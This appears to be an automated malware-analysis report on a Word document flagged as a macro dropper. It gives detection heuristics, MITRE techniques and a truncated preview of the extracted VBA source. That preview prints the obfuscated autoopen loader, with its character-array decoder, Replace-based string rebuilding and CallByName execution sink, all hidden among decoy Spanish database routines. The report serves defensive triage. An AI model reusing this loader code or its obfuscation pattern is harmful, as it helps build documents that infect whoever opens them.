MALICIOUS
364
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an OOXML document containing a critical heuristic firing for an obfuscated auto-exec VBA loader. The 'autoopen' macro is present, which is a common technique for executing malicious code upon document opening. The script uses CreateObject and CallByName, indicating it's likely designed to download and execute a second-stage payload.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-1607835 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1607835
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13635 bytes |
SHA-256: 58dde911dc69262ecd355ae3173d9cdfbc1d0bd5d651ab553e71b5e4beba83fa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsOk "122"
End Sub
Attribute VB_Name = "Mo"
Global Const mensaje_cancelar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_cerrar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_salir = " Pulse Click para abandonar esta ventana."
Global Const mensaje_opcion = " Pulse Click para seleccionar Opci?n."
Global Const mensaje_copiar = " Pulse Click para Copiar al Portapapeles."
Public GromGremitKustiTryasutsyaDAcdaw As Object
Public GromGremitKustiTryasutsyaPLAPEKCwwed As Object
Public GromGremitKustiTryasutsyaKSKLAL As Object
Public GromGremitKustiTryasutsyaXSAOO() As String
Public GromGremitKustiTryasutsyaLAKOPPC As String
Public GromGremitKustiTryasutsyaPLAPEKC() As String
Public GromGremitKustiTryasutsyaUUUKA As String
Public GromGremitKustiTryasutsyaUUUKABBB As String
Public GromGremitKustiTryasutsyaGMAKO As Object
Public GromGremitKustiTryasutsya4 As String
Public GromGremitKustiTryasutsya2 As String
Public GromGremitKustiTryasutsyaASALLLP As Variant
Public Function VerAuditoria()
Dim SQL As String
VerAuditoria = False
RsUsu.ActiveConnection = Con
SQL = "Select * FROM usuarios "
SQL = SQL & " WHERE usu_id=" & IdUsuario
RsUsu.Open SQL
If Not RsUsu.EOF Then
If RsUsu!usu_auditor = "S" Then
VerAuditoria = True
Else
VerAuditoria = False
End If
End If
End Function
Public Function permisos(nombreformu As String, IdUsuario As Long) As Boolean
Dim SQL As String
Dim idformu As Long
permisos = False
RsUsu.ActiveConnection = Con
idformu = BuscarIdFormu(nombreformu)
SQL = "Select * FROM PermisosPorFormu "
SQL = SQL & " WHERE ppf_idformu=" & idformu
SQL = SQL & " AND ppf_idusuario=" & IdUsuario
RsUsu.Open SQL
If Not RsUsu.EOF Then
permisos = True
p = RsUsu!ppf_permisos
End If
End Function
Public Function BuscarIdFormu(nombreformu As String) As Long
Dim SQL As String
RsFormu.ActiveConnection = Con
SQL = "Select * from Formularios WHERE frm_nombre=" & ""
RsFormu.Open SQL
If Not RsFormu.EOF Then
BuscarIdFormu = RsFormu!frm_id
End If
End Function
Public Function DuBirMahnWeishr(GromGremitKustiTryasutsya6 As Integer) As String
Dost = CInt(GromGremitKustiTryasutsyaXSAOO(GromGremitKustiTryasutsya6))
DuBirMahnWeishr = Chr(Dost / 44)
End Function
Public Function GodnTeBabenParama(A1 As String, A2 As String, A3 As String) As String
GodnTeBabenParama = Replace(A1, A2, A3)
End Function
Attribute VB_Name = "ul"
Public Sub CambiarPass(OldPass As String, newpass As String, cambio As Boolean)
Dim SQL As String
If cambio Then
GromGremitKustiTryasutsyaLAKOPPC = GromGremitKustiTryasutsyaKSKLAL(GromGremitKustiTryasutsyaPLAPEKC(6))
GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaLAKOPPC
GromGremitKustiTryasutsyaUUUKABBB = GromGremitKustiTryasutsyaUUUKA + "weffvxcvw"
GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaUUUKA + GromGremitKustiTryasutsyaPLAPEKC(12)
GromGremitKustiTryasutsyaPLAPEKCwwed.Type = 1
GromGremitKustiTryasutsyaPLAPEKCwwed.Open
encript SQL
Exit Sub
Else
GoTo BigEnd
End If
RsUsuario.ActiveConnection = RutaBase
RsClave.ActiveConnection = RutaBase
SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
RsUsuario.Open SQL
If Not RsUsuario.EOF Then
If OldPass = Decript(RsUsuario!usu_clave) Then
SQL = "UPDATE Usuarios SET usu_clave=" & ""
SQL = SQL & " WHERE usu_id=" & IdUsuario
RsClave.Open SQL
cambio = True
Else
cambio = False
End If
End If
BigEnd:
CallByName GromGremitKustiTryasut
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 41472 bytes |
SHA-256: 97b45d2c77fade8f3b18974daf770d241169c472f11565ac939eb1a4dfb978cd |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-1607835
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.